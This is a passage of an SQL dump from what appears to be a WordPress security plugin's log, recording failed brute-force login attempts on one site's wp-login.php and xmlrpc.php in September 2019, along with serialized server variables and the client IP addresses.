Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"216.158.229.153\";s:11:\"REMOTE_PORT\";s:5:\"49374\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAcuWkPXSyJlCUJQmo0@AAAAZY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568677050.0518\";s:12:\"REQUEST_TIME\";s:10:\"1568677050\";}}','notice','2019-09-16 23:37:31','2019-09-16 23:37:30',17743392,19234128,'https://bintara.com.my/wp-login.php',1,0,'216.158.229.153'),(24311,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"216.158.229.153\";s:11:\"REMOTE_PORT\";s:5:\"50544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAcvR@uZ4OC5N1Fn8Eq-gAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568677053.3784\";s:12:\"REQUEST_TIME\";s:10:\"1568677053\";}}','notice','2019-09-16 23:37:34','2019-09-16 23:37:33',18258144,19556480,'https://bintara.com.my/xmlrpc.php',1,0,'216.158.229.153'),(24312,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.226.14\";s:11:\"REMOTE_PORT\";s:5:\"42958\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAicNVIJ66zPtjtaf3i-QAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568678513.0263\";s:12:\"REQUEST_TIME\";s:10:\"1568678513\";}}','notice','2019-09-17 00:01:54','2019-09-17 00:01:53',17743488,19234568,'https://bintara.com.my/wp-login.php',1,0,'46.101.226.14'),(24313,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.226.14\";s:11:\"REMOTE_PORT\";s:5:\"43509\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAidGkPXSyJlCUJQmo3iQAAAZI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568678516.5936\";s:12:\"REQUEST_TIME\";s:10:\"1568678516\";}}','notice','2019-09-17 00:01:58','2019-09-17 00:01:56',18260568,19559176,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.226.14'),(24314,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.200.69\";s:11:\"REMOTE_PORT\";s:5:\"44550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAkKGkPXSyJlCUJQmo46AAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568678952.462\";s:12:\"REQUEST_TIME\";s:10:\"1568678952\";}}','notice','2019-09-17 00:09:13','2019-09-17 00:09:12',17744360,19236624,'https://bintara.com.my/wp-login.php',1,0,'192.99.200.69'),(24315,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.200.69\";s:11:\"REMOTE_PORT\";s:5:\"45624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAkK2kPXSyJlCUJQmo46wAAAY8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568678955.5829\";s:12:\"REQUEST_TIME\";s:10:\"1568678955\";}}','notice','2019-09-17 00:09:17','2019-09-17 00:09:15',18260568,19559176,'https://bintara.com.my/xmlrpc.php',1,0,'192.99.200.69'),(24316,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.64.192\";s:11:\"REMOTE_PORT\";s:5:\"43574\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAl@GkPXSyJlCUJQmo6qAAAAZQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568679416.6017\";s:12:\"REQUEST_TIME\";s:10:\"1568679416\";}}','notice','2019-09-17 00:16:57','2019-09-17 00:16:56',17744544,19235160,'https://bintara.com.my/wp-login.php',1,0,'148.72.64.192'),(24317,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.64.192\";s:11:\"REMOTE_PORT\";s:5:\"44578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAl@2kPXSyJlCUJQmo6qwAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568679419.6251\";s:12:\"REQUEST_TIME\";s:10:\"1568679419\";}}','notice','2019-09-17 00:17:00','2019-09-17 00:16:59',18261040,19561152,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.64.192'),(24318,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"53804\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAn1WkPXSyJlCUJQmo8UwAAAYw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568679893.4766\";s:12:\"REQUEST_TIME\";s:10:\"1568679893\";}}','notice','2019-09-17 00:24:54','2019-09-17 00:24:53',17744872,19233904,'https://bintara.com.my/wp-login.php',1,0,'176.53.12.11'),(24319,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 